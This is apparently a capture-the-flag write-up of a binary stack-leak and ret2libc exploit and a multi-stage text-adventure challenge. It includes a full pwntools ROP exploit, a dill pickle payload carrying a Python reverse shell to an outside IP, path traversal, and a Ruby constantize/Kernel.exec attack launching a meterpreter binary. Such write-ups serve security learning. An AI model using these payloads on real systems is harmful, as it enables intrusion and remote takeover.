If I overwrote every byte until the return pointer, I would also overwrite the stack canary which triggered an error. However, remember how the inputs for the “Get Recruited” functions were XORed with sanity_test_input? Since I controlled each of the three memcpys' arguments via the overwrite, I could attempt to copy the stack canary into sanity_test_input using the third memcpy, then retrieve the XORed canary via the “Show what you have for the Cromulon currently” function.

Initially, I planned to overwrite the bytes up till the first memcpy n argument and set n to a large enough number to also copy over the stack canary bytes. However, since the second memcpy used n / 2 for the size argument, to ensure that the canary was copied over in the second memcpy, n needed to be so large that the first memcpy would already overwrite the stack canary. Worse, I also realised that the copied bytes had to be null-free because the xor_passphrase_with_sanity_input function only XORed the appended strings up till the first null byte in sanity_test_input. It dawned on me that I had to thread a very fine needle; this challenge was surgically designed.

(I would later learn that this was in fact the hardest possible way I could have solved this challenge; there was a simpler stack setup as well as a heap exploit route but clearly I wanted to suffer more.)

In order to properly leak data from the stack, I needed to overwrite the bytes in such a way that the 3rd memcpy copied over stack bytes into sanity_test_input that would both pass the sanity test AND be XORed later on. I tested various permutations of overwritten bytes, using pwntools to speed up my work. To quickly debug the program, I wrote a Bash one-liner: gdb ./1adb53a4b156cef3bf91c933d2255ef30720c34f $(ps aux | grep ./1adb53a4b156cef3bf91c933d2255ef30720c34f | grep -v grep | cut -d ' ' -f9). This would hook onto the running instance created by my pwntools script.

After painstakingly trying hundreds of different inputs over several hours, I eventually figured out an overwrite that would get the result I wanted. By crafting my payload with precise offsets, I could manipulate the first two memcpys such that I overwrote the last byte in the 3rd memcpy's src argument on the stack. With luck, the overwritten byte would cause the src to point to the return address or any other desired value such as the canary. I needed luck because the stack addresses changed each time the binary was executed. As such, I had to brute force the correct offset.

It may be easier to explain this by stepping through each memcpy, so let's get right into it.

I prepared my payload like this:

payload = b'B' * 60                                 # offset
payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
payload += b'B' * 43                                # more offset
payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
p.sendline(payload)

With this payload, the stack BEFORE the first memcpy looked like this:

75d0: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
75e0: 0x00000000  0x00000000  0x00000000  0x00000000 
75f0: 0x00000000  0x00000000  0x656c2963  0x00007fca < 8 null bytes | libc_write+19
7600: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
7610: 0x41414141  0x41414141  0x41414141  0x41414141 
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000011 < *2nd memcpy dst
7640: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 1st memcpy dst / 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Thanks to the overflow from receiving user input, I overwrote the value of n on the stack to \x82. This caused the first memcpy to copy both my original inputs and additional bytes on the stack to *1st memcpy dst. The stack AFTER the first memcpy and BEFORE the second memcpy now looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy src
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000082 < *2nd memcpy dst
7640: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc 
7650: 0x424275d0  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Nothing too special. However, the magic happened in the next memcpy. The stack AFTER the second memcpy and BEFORE the third memcpy looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x41414141
7640: 0x41414141  0x41414141  0x41414141  0x41414141 
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000011 < 12 filler bytes | 3rd memcpy n + 1
7670: 0xb56176XX  0x00007ffc  0xb5617600  0x00007ffc < 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

I overwrote two important values:

The n used to generate the 3rd memcpy's size argument (n-1) to 0x11 .
The last byte of the 3rd memcpy's src argument to my candidate byte offset 0xXX.

When my brute force set the candidate byte to 0x98, the 3rd memcpy's src pointed to the stack address of the return pointer (0x7ffcb5617698), allowing me to copy the return pointer address to sanity_test_input. The overwritten n also set sanity_test_result to *0x7ffcb56176a8 = 0x40 which passed the sanity test. After that, I could simply enter a string of length 0x11 like 1111111111111111 at the “Get Recruited” prompt, which XORed the stored sanity_test_input. I could then run “Show what you have for the Cromulon currently” to output the result and XOR it with 1111111111111111 again to retrieve the return pointer value.

If the candidate offset correctly retrieved the return pointer, the first retrieved byte would be the return pointer's last byte. This seemed to always match 0xa2, so I used this constant to check for a successful candidate. There was a chance that no valid candidates existed; if the return pointer was at 0x7ffcb5617708 but the 3rd memcpy src value was originally set to 0x7ffcb56176X8, I could only brute force the last byte up to 0x7ffcb56176f8. In this case, I simply needed to run the exploit again and hope to get lucky.

I deducted a fixed offset (0x3EA2) from the return pointer value to get the base address of the executable. Additionally, now that I knew the offset in the stack to the return pointer, I could add or subtract it accordingly to retrieve other interesting values on the stack, such as __libc_start_main+234, the stack canary, and a valid stack pointer.

With those values, I could send a large input with the proper stack canary and overwrite the return pointer to my desired function pointer, such as system in libc. I avoided crashing the three memcpys by overwriting the src and dest arguments to the leaked valid stack addresses and setting the size argument to something small like 1.

At first, I tried to return to an interesting function in the binary that printed the flag:

__int64 read_flag()
{
  char v1; // [rsp+Fh] [rbp-231h] BYREF
  char v2[264]; // [rsp+10h] [rbp-230h] BYREF
  _QWORD v3[37]; // [rsp+118h] [rbp-128h] BYREF

  v3[34] = __readfsqword(0x28u);
  std::fstream::basic_fstream(v2);
  std::fstream::open(v2, "/root/f1988cec5de9eaa97ab11740e10b1fc8d6db8123", 8LL);
  if ( (unsigned __int8)std::ios::operator!(v3) )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "No such file\n");
  }
  else
  {
    while ( 1 )
    {
      std::operator>><char,std::char_traits<char>>(v2, &v1);
      if ( (unsigned __int8)std::ios::eof(v3) )
        break;
      std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v1);
    }
    std::operator<<<std::char_traits<char>>(&std::cout, "\n");
  }
  std::fstream::close(v2);
  std::fstream::~fstream(v2);
  return 0LL;
}

However, despite the exploit working locally, I could not get it to work remotely. I assumed that this was because the executable crashed too quickly to return output over the network. As such, I decided to go the ret2libc route and get a shell by adding system to the call stack. Since the offsets in libc varied widely over different versions, I used the file disclosure vulnerability from earlier to leak /proc/self/maps and /etc/os-release to determine the exact OS and libc versions, which were “Ubuntu 20.04.3 LTS (Focal Fossa)” and libc-2.31.so respectively. Since Googling the server's IP address revealed that it belonged to a DigitalOcean Singapore cluster, I spun up a free Droplet instance on the same cluster with the matching OS version to retrieve the offsets. This turned out to be a hidden bonus because the proximity of my Droplet instance to the target server allowed my exploit to catch the shell faster before the program crashed.

Finally, I needed to pop the pointer to /bin/sh in libc into RDI before calling system. This was because the x64 calling convention uses RDI as the first argument for a function call. I used rp++ to dump ROP gadgets from the binary and added the POP RDI, RET gadget to the overwritten call stack.

At long last, I completed my full exploit code:

from pwn import *

p = remote('<IP ADDRESS>', 53619)
##p = process('./1adb53a4b156cef3bf91c933d2255ef30720c34f')

def byte_xor(ba1, ba2):
    return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])

## leak base_addr of executable
return_pointer_offset = 8
while True:
    # send payload
    p.recvuntil("> ")
    p.sendline(b'1')
    payload = b'B' * 60                                 # offset
    payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
    payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
    payload += b'B' * 43                                # more offset
    payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
    p.sendline(payload)

    # retrieve sanity_test_input
    p.recvuntil("> ")
    p.sendline(b'2')
    if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
        p.sendline(b'1111111111111111')
        p.recvuntil("> ")
        p.sendline(b'4')
        p.recvuntil("`======/")
        p.recvline()
        candidate = p.recvline()
        print(candidate.hex())
        if 0x93 == candidate[0]:                        # confirm that this is a leaked function address; last byte is 0xa2 == 0x93 XOR 0x31
            base_addr = (int.from_bytes(byte_xor(candidate[:6][::-1], b'111111'), 'big', signed=False) - 0x3EA2).to_bytes(8, byteorder='big', signed=False)
            log.info('Base address: {}'.format(base_addr.hex()))
            p.recvuntil("> ")
            p.sendline(b'6')
            break
        p.recvuntil("> ")
        p.sendline(b'6')
    return_pointer_offset += 16

libc_start_main_plus_234_offset = return_pointer_offset + 0x30        # offset in stack from function pointer to __libc_start_main+234
canary_offset = return_pointer_offset - 0x10 + 1                      # offset in stack from function pointer to canary + 1 (skip null token)
stack_address_offset = return_pointer_offset - 0x18                   # offset in stack from function pointer to canary + 1 (skip null token)

if stack_address_offset < 0 or libc_start_main_plus_234_offset > 255:
    log.error("Base offset is too low")

## leak canary
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result passes
payload += packing.p8(canary_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    canary = byte_xor(candidate[:7][::-1], b'1111111') + b'\x00'    # restore null last byte

    log.info("Canary: {}".format(canary.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak libc_main_plus_234
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result == B which passes test4 #21 for local
payload += packing.p8(libc_start_main_plus_234_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    libc_main_plus_234 = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('libc_main_plus_234 address: {}'.format(libc_main_plus_234.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')

## leak stack address
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x19\x00\x00\x00' # ensures that sanity_test_result passes test4
payload += packing.p8(stack_address_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)

p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    stack_address = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('Stack address: {}'.format(stack_address.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')


## prepare addresses
flag_function_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3BBC).to_bytes(8, byteorder='big', signed=False)
log.info('Flag function address: {}'.format(flag_function_address.hex()))

get_recruited_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3606).to_bytes(8, byteorder='big', signed=False)
log.info('get_recruited function address: {}'.format(get_recruited_address.hex()))

pop_rdi_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x5073).to_bytes(8, byteorder='big', signed=False)
log.info('pop_rdi_ret address: {}'.format(pop_rdi_ret.hex()))

libc_base_addr = (int.from_bytes(libc_main_plus_234, 'big', signed=False) - 0x270B3).to_bytes(8, byteorder='big', signed=False)
log.info('libc_base_addr address: {}'.format(libc_base_addr.hex()))

libc_system_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x55410).to_bytes(8, byteorder='big', signed=False)
log.info('libc_system_addr: {}'.format(libc_system_addr.hex()))

libc_bin_sh_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x1B75AA).to_bytes(8, byteorder='big', signed=False)
log.info('libc_bin_sh_addr: {}'.format(libc_bin_sh_addr.hex()))
dec_ecx_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x2AE2).to_bytes(8, byteorder='big', signed=False)

## prepare final payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 108                    # offset
payload += b'\x01\x00\x00\x00'          # n
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += stack_address[::-1]          # valid stack address
payload += canary[::-1]                 # valid canary
payload += b'A' * 8                     # offset            
payload += flag_function_address[::-1]  # try to call flag function - somehow this doesn't work remotely?
payload += pop_rdi_ret[::-1]            # ROP to pop pointer to "/bin/sh" to RDI
payload += libc_bin_sh_addr[::-1]       # pointer to "/bin/sh"
payload += libc_system_addr[::-1]       # pointer to system

## send final payload
print(p.recvline())
print(p.recv())
p.sendline(payload)

p.interactive()

I ran this several times on my Droplet instance and eventually got my shell.

Shell

TISC{30e903d64775c0120e5c244bfe8cbb0fd44a908b}

Level 9: 1865 Text Adventure

This was my favourite level and felt like a digital work of art. I loved the storyline and although one of the domains was Pwn, it was actually Web as you will see soon. Finally, it involved a lot of code review, which I enjoyed.

It began with a tumble...

Part 1: Down the Rabbit Hole

Domains: Pwn, Cryptography

Text adventures are fading ghosts of a faraway past but this one looks suspiciously brand new... and it has the signs of PALINDROME all over it.

Our analysts believe that we need to learn more about the White Rabbit but when we connect to the game, we just keep getting lost!

Can you help us access the secrets left in the Rabbit's burrow?

The game is hosted at 165.22.48.155:26181.

No kernel exploits are required for this challenge.

Connecting to <IP ADDRESS>:26181 kicked off a long, scrolling text adventure.

Alice in Wonderland

I could look around my location, move to another exit, read notes, or get items. I set about enumerating every path in the text adventure. Along the way, I picked up several useful items:

The Pocket Watch: This gave me access to an options menu, which I used to turn off the annoying scrolling text.
The Looking Glass: This gave me the ability to teleport to other locations in the story. teleport bottom-of-a-pit/deeper-into-the-burrow
Golden Hookah: This gave me the ability to save messages... somewhere. blowsmoke <NAME> <MESSAGE>.

After a few twists and turns, the text adventure reached a dead end.

[cosmic-desert] move tear-in-the-rift
You have moved to a new location: 'tear-in-the-rift'.

You look around and see:
A curious light shines in the distance. You cannot quite reach it though.

Music tinkles through the rift:

    A very merry unbirthday
    To you
    Who, me?
    Yes, you
    Oh, me
    Let's all congratulate us with another cup of tea
    A very merry unbirthday to you

There are the following things here:
  * README (note)

[tear-in-the-rift] read README
You read the writing on the note:
Do you hear that? What lovely party sounds!

Wouldn't it be lovely to crash it and get some tea and crumpets?

Too bad you're stuck here!

You can cage a swallow, can't you, but you can't swallow a cage, can you?

Fly back to school now, little starling.

- PALINDROME

With nowhere left to go, I began messing about with the items. My first clue surfaced when I used the Golden Hookah to send a message with a format string.

[tear-in-the-rift] blowsmoke spaceraccoon %s
Smoke bellows from the lips of spaceraccoon to form the words, "%s."
Curling and curling...
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 511, in run
    response = urlopen(url)
  File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.8/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
    response = self.parent.error(
  File "/usr/lib/python3.8/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: Bad Request

The Python backend was trying to send a HTTP request with my message! However, further experimentation with traversal and command injection payloads failed to yield any results. I moved on to The Looking Glass. I attempted several invalid inputs, including a long string:

[cosmic-desert] teleport vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>
Traceback (most recent call last):
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
    self.evaluate(user_line)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
    cmd.run(args)
  File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 475, in run
    if rel_path.exists() and rel_path.is_dir():
  File "/usr/lib/python3.8/pathlib.py", line 1407, in exists
    self.stat()
  File "/usr/lib/python3.8/pathlib.py", line 1198, in stat
    return self._accessor.stat(self)
OSError: [Errno 36] File name too long: '/opt/wonderland/down-the-rabbithole/stories/vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>'

This looked like a directory traversal! Perhaps teleporting meant moving to a different folder location in the server. I took the next obvious step.

[tear-in-the-rift] teleport ../../../../etc
You have moved to a new location: 'etc'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
There are the following things here:
  * environment (note)
  * fstab (note)
  * networks (note)
  * mke2fs.conf (note)
  * ld.so.conf (note)
  * passwd (note)
  * shells (note)
  * debconf.conf (note)
  * ld.so.cache (note)
  * legal (note)
  * xattr.conf (note)
  * hostname (note)
  * e2scrub.conf (note)
  * issue (note)
  * bindresvport.blacklist (note)
...

Bingo! Now that I was in a different folder, I could read files with the read command. After enumerating various locations, I ended up in /home/rabbit which contained the first flag.

[mouse] teleport ../../../../home/rabbit
You have moved to a new location: 'rabbit'.

You look around and see:
You enter the Rabbit's burrow and find it completely ransacked. Scrawled across the walls of the
tunnel is a message written in blood: 'Murder for a jar of red rum!'.

Your eyes are drawn to a twinkling letter and lockbox that shines at you from the dirt.

There are the following things here:
  * flag2.bin (note)
  * flag1 (note)

[rabbit] read flag1
You read the writing on the note:
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}

TISC{r4bbb1t_kn3w_1_pr3f3r_p1}

Part 2: Pool of Tears

It looks like the Rabbit knew too much about PALINDROME. Within his cache of secrets lies a special device that might just unlock clues to tracking down the elusive trickster. However, our attempts to read it yield pure gibberish.

It appears to require... activation. To activate it, we must first become the Rabbit.

Please assume the identity of the Rabbit.

The challenge description hinted that I needed to get a working shell as rabbit to execute flag2.bin. I returned to the /opt/wonderland/down-the-rabbithole folder that contained the Python source code for the text adventure. rabbithole.py contained most of the game logic. Right away, I noticed that it imported pickletools and used Python object deserialisation (dill.loads) to “get” items.

def run(self, args):
    if len(args) < 2:
        letterwise_print("You don't see that here.")
        return
    for i in self.game.get_items():
        if (args[1] + '.item') == i.name and args[1] not in self.game.inventory:
            got_something = True
            # Check that the item must be serialised with dill.
            item_data = open(i, 'rb').read()
            if not self.validate_stream(item_data):
                letterwise_print('Seems like that item may be an illusion.')
                return
            item = dill.loads(item_data)
            letterwise_print("You pick up '{}'.".format(item.key))
            self.game.inventory[item.key] = item
            item.prepare(self.game)
            item.on_get()
            return

Since Python object deserialisation was an easy code execution vector, I focused on this lead. How could I create a pickle file on the server to “get” later? Enumerating more folders, I realised that /opt/wonderland contained the source code of two other applications:

[..] teleport ../..
You have moved to a new location: '..'.

You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
You see exits to the:
  * logs
  * pool-of-tears
  * a-mad-tea-party
  * down-the-rabbithole
  * utils

a-mad-tea-party turned out to be a Java application, while pool-of-tears contained a Ruby on Rails web API. In logs, I found some of the messages I sent using blowsmoke earlier. This suggested that blowsmoke enabled me to write files – exactly what I needed.

To prepare my pickle, I referred to the generate_items.py script from the source code of down-the-rabbithole. The application validated items by checking for rabbithole, dill._dill, and on_get properties, so I reused the code to meet these requirements with one importance difference – my payload generation script inserted a Python reverse shell in on_get.

import dill
import types
from rabbithole import Item
import socket
import os
import pty
import urllib.parse

dill.settings['recurse'] = True

def write_object(location, obj):
    '''Writes an object to the specified location.
    '''
    with open(location, 'wb') as f:
        dill.dump(obj, f, recurse=True)

def make_item(key, on_get):
    '''Makes a new item dynamically.
    '''
    item = Item(key)
    item.on_get = types.MethodType(on_get, item)
    return item

def payload_on_get(self):
    '''Add the options command when picked up.
    '''
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("<IP ADDRESS>",4242))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

def setup_payload():
    item = make_item('payload', payload_on_get)
    write_object('payload.item', item)

if __name__ == '__main__':
    setup_payload()
    # open_payload()
    with open('payload.item', 'rb') as file:
        print("Generated {}".format(urllib.parse.quote(file.read())))

After generating the URL-encoded payload, I sent it off with blowsmoke a.item <URL-ENCODED PAYLOAD>. This saved the payload to /opt/wonderland/logs/tear-in-the-rift-a.item. Finally, in the text adventure game, I teleported to /opt/wonderland/logs and ran get tear-in-the-rift-a.item to execute the payload. To save time, I automated the entire process with pwntools.


from pwn import *
import urllib

p = remote('<IP ADDRESS>', 26181)

print(p.recvuntil(b']'))
p.sendline(b'move a-shallow-deadend')
print(p.recvuntil(b']'))
p.sendline(b'get pocket-watch')
print(p.recvuntil(b']'))
p.sendline(b'options text_scroll False')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move deeper-into-the-burrow')
print(p.recvuntil(b']'))
p.sendline(b'move a-curious-hall')
print(p.recvuntil(b']'))
p.sendline(b'get pink-bottle')
print(p.recvuntil(b']'))
p.sendline(b'move a-pink-door')
print(p.recvuntil(b']'))
p.sendline(b'move maze-entrance')
print(p.recvuntil(b']'))
p.sendline(b'move knotted-boughs')
print(p.recvuntil(b']'))
p.sendline(b'move dazzling-pines')
print(p.recvuntil(b']'))
p.sendline(b'move a-pause-in-the-trees')
print(p.recvuntil(b']'))
p.sendline(b'move confusing-knot')
print(p.recvuntil(b']'))
p.sendline(b'move green-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move a-fancy-pavillion')
print(p.recvuntil(b']'))
p.sendline(b'get fluffy-cake')
print(p.recvuntil(b']'))
p.sendline(b'move along-the-rolling-waves')
print(p.recvuntil(b']'))
p.sendline(b'move a-sandy-shore')
print(p.recvuntil(b']'))
p.sendline(b'move a-mystical-cove')
print(p.recvuntil(b']'))
p.sendline(b'get looking-glass')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move further-into-the-woods')
print(p.recvuntil(b']'))
p.sendline(b'move nearing-a-clearing')
print(p.recvuntil(b']'))
p.sendline(b'move clearing-of-flowers')
print(p.recvuntil(b']'))
p.sendline(b'get morning-glory')
print(p.recvuntil(b']'))
p.sendline(b'move under-a-giant-mushroom')
print(p.recvuntil(b']'))
p.sendline(b'get golden-hookah')
print(p.recvuntil(b']'))
p.sendline(b'move eternal-desolation')
print(p.recvuntil(b']'))
p.sendline(b'move cosmic-desert')
print(p.recvuntil(b']'))
p.sendline(b'move tear-in-the-rift')
print(p.recvuntil(b']'))


## read flag2.bin
## p.sendline(b'teleport ../../../../home/rabbit')
## print(p.recvuntil(b'[rabbit]'))
## p.sendline(b'read flag2.bin')
## flag2_bin = p.recvuntil(b']')
## with open('flag2.bin', 'wb') as file:
##     file.write(flag2_bin)

## send payload
with open('payload.item', 'rb') as file:
    p.sendline(b'blowsmoke a.item ' + urllib.parse.quote(file.read()).encode())
print(p.recvuntil(b']'))

## execute payload
p.sendline(b'teleport ../../../../opt/wonderland/logs')
print(p.recvuntil(b']'))
p.sendline(b'get tear-in-the-rift-a')
print(p.recvuntil(b']'))


p.interactive()

The exploit went off without a hitch and I got my shell.

Reverse Shell

TISC{dr4b_4s_a_f00l_as_al00f_a5_A_b4rd}

Part 3: Advice from a Caterpillar

PALINDROME's taunts are clear: they await us at the Tea Party hosted by the Mad Hatter and the March Hare. We need to gain access to it as soon as possible before it's over.

The flowers said that the French Mouse was invited. Perhaps she hid the invitation in her warren. It is said that her home is decorated with all sorts of oddly shaped mirrors but the tragic thing is that she's afraid of her own reflection.

This challenge description included the key word “reflection”. I immediately thought of Java reflection attacks but the Java app a-mad-tea-party was executed by the hatter user rather than mouse. From my shell, I exfiltrated all the source code in /opt/wonderland and reviewed the pool-of-tears Rails application run by mouse.

The controller logic for the blowsmoke API at pool-of-tears/app/controllers/smoke_controller.rb had the following code.

  def remember
    # Log down messages from our happy players!

    begin
      ctype = "File"
      if params.has_key? :ctype
        # Support for future appending type.
        ctype = params[:ctype]
      end

      cargs = []
      if params.has_key?(:cargs) && params[:cargs].kind_of?(Array)
        cargs = params[:cargs]
      end

      cop = "new"
      if params.has_key?(:cop)
        cop = params[:cop]
      end

      if params.has_key?(:uniqid) && params.has_key?(:content)
        # Leave the kind messages
        fn = Rails.application.config.message_dir + params[:uniqid]
        cargs.unshift(fn)
        c = ctype.constantize
        k = c.public_send(cop, *cargs)
        if k.kind_of?(File)
          k.write(params[:content])
          k.close()
        else
          # TODO: Implement more types when we need distributed logging.
          # PALINDROME: Won't cat lovers revolt? Act now!
          render :plain => "Type is not implemented yet."
          return
        end

      else
        render :plain => "ERROR"
        return
      end
    rescue => e
      render :plain => "ERROR: " + e.to_s
      return
    end

The comments and the use of ctype.constantize attracted my attention and I wondered if Ruby reflection attacks existed. They did.

Based on the source code, the ctype parameter initalised a matching Ruby object with ctype.constantize. Thereafter, c.public_send executed any of that object's public methods based on the cop parameter. The method was executed with arguments from the cargs array parameter.

However, pool-of-tears featured an interesting twist: because it prepended Rails.application.config. message_dir + params[:uniqid] string to the cargs array, I could not execute anything I wanted; the method needed to accept the concatenated file path as the first argument. For example, one publicly-known Ruby reflection payload used Object.public_send("send","eval","system 'uname'"), which required the first argument to send to be eval. Since eval was a private method for Object, I could not execute it directly with public_send.

I searched the Ruby documentation for a suitable class and public method that allowed me to execute code. Eventually, I found the Kernel class that included an exec public method. The first argument determined the command to be executed. Since this could be a file path, I realised that I could exploit a path traversal by sending a uniqid parameter like ../../../../../tmp/meterpreter. This led to c.public_send('exec', '/opt/wonderland/logs/../../../../../tmp/meterpreter'), therefore executing my meterpreter payload.

I uploaded the payload to /tmp/met64.elf, then triggered the API with curl 'http://localhost:4000/ api/v1/smoke?ctype=Kernel&cop=exec&uniqid= ../../../../tmp/met64.elf&content=test'. After a few tense seconds, I got my shell!

/home/mouse contained a binary flag3.bin which I executed to retrieve the flag. The directory also included an-unbirthday-invitation.letter:

Dear French Mouse,

    The March Hare and the Mad Hatter
        request the pleasure of your company
            for an tea party evening filled with
                clocks, food, fiddles, fireworks & more


    Last Month
        25:60 p.m.
            By the Stream, and Into the Woods
                Also available by way of port 4714

    Comfortable outdoor attire suggested

PS: Dormouse will be there!

PSPS: No palindromes will be tolerated! Nor are emordnilaps, and semordnilaps!

By the way, please quote the following before entering the party:


ed4a1a59-0869-48ad-8bc6-ac64b04b02b6

TISC{mu5t_53ll_4t_th3_t4l13sT_5UM}

Part 4: A Mad Tea Party

Great! We have all we need to attend the Tea Party!

To get an idea of what to expect, we've consulted with our informant (initials C.C) who advised:

“Attend the Mad Tea Party.

Come back with (what's in) the Hatter's head.

Sometimes the end of a tale might not be the end of the story.

